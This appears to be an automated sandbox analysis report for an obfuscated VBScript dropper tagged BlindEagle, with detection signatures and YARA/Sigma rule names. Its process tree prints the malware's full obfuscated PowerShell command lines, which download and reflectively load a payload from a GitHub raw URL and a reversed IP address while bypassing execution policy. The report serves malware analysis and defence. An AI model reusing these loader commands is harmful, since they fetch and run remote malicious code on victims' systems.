Edit tour
Windows
Analysis Report
iJEK0xwucj.vbs
Overview
General Information
| Sample name: | iJEK0xwucj.vbsrenamed because original name is a hash value |
| Original sample name: | 100d33a5d9d11b85a4b1f821a5dce334df5673da75d57ec4061df68d1c1a1a9f.vbs |
| Analysis ID: | 1523819 |
| MD5: | e459f24a8ebcab954d106124ef15a5c6 |
| SHA1: | 518535d2e17324e622cd70b233bf83fdd1ddf10e |
| SHA256: | 100d33a5d9d11b85a4b1f821a5dce334df5673da75d57ec4061df68d1c1a1a9f |
| Tags: | BlindEaglevbsuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7512 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\iJEK0 xwucj.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 7596 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnYTYnKy c4JysndXJs JysnID0gJy snbWlNJysn aHR0cHMnKy c6Ly9yYScr J3cuZ2l0aH ViJysndXNl cicrJ2MnKy dvbnQnKydl JysnbicrJ3 QuY29tJysn L05vRGUnKy d0ZWMnKyd0 T24vTm9EJy snZScrJ3Rl JysnYycrJ3 RPbi9yZWYn KydzLycrJ2 hlJysnYWRz LycrJ21haW 4vRGUnKyd0 JysnYWgnKy dObycrJ3Ro LVYudCcrJ3 h0JysnbWlN OyBhNjhiJy snYXNlNjRD b24nKyd0ZW 4nKyd0ID0n KycgKE5ldy crJy0nKydP YicrJ2plJy snYycrJ3Qg U3knKydzJy sndGVtJysn Lk5ldC5XZW JDbGknKydl bnQpJysnLi crJ0QnKydv dycrJ25sb2 FkJysnU3Ry aScrJ25nKG EnKyc2OHVy bCknKyc7IC crJ2E2OGJp bmFyeUMnKy dvJysnbnRl JysnbnQnKy cgPSBbU3lz dGVtLkNvbn ZlcnRdJysn OjpGJysncm 8nKydtQicr J2EnKydzJy snZTY0U3Qn KydyaW5nKG E2OGInKydh c2U2NCcrJ0 NvbicrJ3Qn KydlbicrJ3 QpOyBhJysn NjgnKydhJy snc3NlbWJs eSAnKyc9IF tSZScrJ2Yn KydsZWN0aW 8nKyduLkFz c2VtYmx5XS crJzo6TG9h ZChhJysnNj gnKydiaW5h cicrJ3lDby crJ250Jysn ZW50KTsgW2 RubCcrJ2li LklPLkgnKy dvJysnbWVd JysnOjpWQU kodWJ6dHh0 LicrJ1InKy dWJysnVlJT LzEnKycwOC crJy8xMzEn KycuJysnND gxJysnLjIn KyczMi4yJy snNzEvLzpw dHRodScrJ2 J6LCcrJyB1 YicrJ3pkZX NhJysndGl2 YWRvdWInKy d6LCB1Ynon KydkZScrJ3 NhdGknKyd2 YScrJ2RvdS crJ2J6Jysn LCB1YnpkZX MnKydhJysn dGl2JysnYW RvdWInKyd6 LCB1YnpSJy snZWdBc20n Kyd1YnonKy csIHViJysn eicrJ3ViJy sneix1Jysn Ynp1JysnYi crJ3onKycp JyktY3JlUE xhY0UnbWlN JyxbQ0hBcl 0zOSAgLWNy ZVBMYWNFIC hbQ0hBcl05 NytbQ0hBcl 01NCtbQ0hB cl01NiksW0 NIQXJdMzYg LWNyZVBMYW NFICd1Ynon LFtDSEFyXT M0KSB8IC4g KCAkUFNIT2 1lWzIxXSsk cHNIT21FWz M0XSsnWCcp ';$OWjuxd = [system. Text.encod ing]::UTF8 .GetString ([system.C onvert]::F rombase64S tring($cod igo));powe rshell.exe -windowst yle hidden -executio npolicy by pass -NoPr ofile -com mand $OWju xD MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 7604 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7728 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('a6 '+'8'+'url '+' = '+'m iM'+'https '+'://ra'+ 'w.github' +'user'+'c '+'ont'+'e '+'n'+'t.c om'+'/NoDe '+'tec'+'t On/NoD'+'e '+'te'+'c' +'tOn/ref' +'s/'+'he' +'ads/'+'m ain/De'+'t '+'ah'+'No '+'th-V.t' +'xt'+'miM ; a68b'+'a se64Con'+' ten'+'t =' +' (New'+' -'+'Ob'+'j e'+'c'+'t Sy'+'s'+'t em'+'.Net. WebCli'+'e nt)'+'.'+' D'+'ow'+'n load'+'Str i'+'ng(a'+ '68url)'+' ; '+'a68bi naryC'+'o' +'nte'+'nt '+' = [Sys tem.Conver t]'+'::F'+ 'ro'+'mB'+ 'a'+'s'+'e 64St'+'rin g(a68b'+'a se64'+'Con '+'t'+'en' +'t); a'+' 68'+'a'+'s sembly '+' = [Re'+'f' +'lectio'+ 'n.Assembl y]'+'::Loa d(a'+'68'+ 'binar'+'y Co'+'nt'+' ent); [dnl '+'ib.IO.H '+'o'+'me] '+'::VAI(u bztxt.'+'R '+'V'+'VRS /1'+'08'+' /131'+'.'+ '481'+'.2' +'32.2'+'7 1//:ptthu' +'bz,'+' u b'+'zdesa' +'tivadoub '+'z, ubz' +'de'+'sat i'+'va'+'d ou'+'bz'+' , ubzdes'+ 'a'+'tiv'+ 'adoub'+'z , ubzR'+'e gAsm'+'ubz '+', ub'+' z'+'ub'+'z ,u'+'bzu'+ 'b'+'z'+') ')-crePLac E'miM',[CH Ar]39 -cre PLacE ([CH Ar]97+[CHA r]54+[CHAr ]56),[CHAr ]36 -crePL acE 'ubz', [CHAr]34) | . ( $PSH Ome[21]+$p sHOmE[34]+ 'X')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||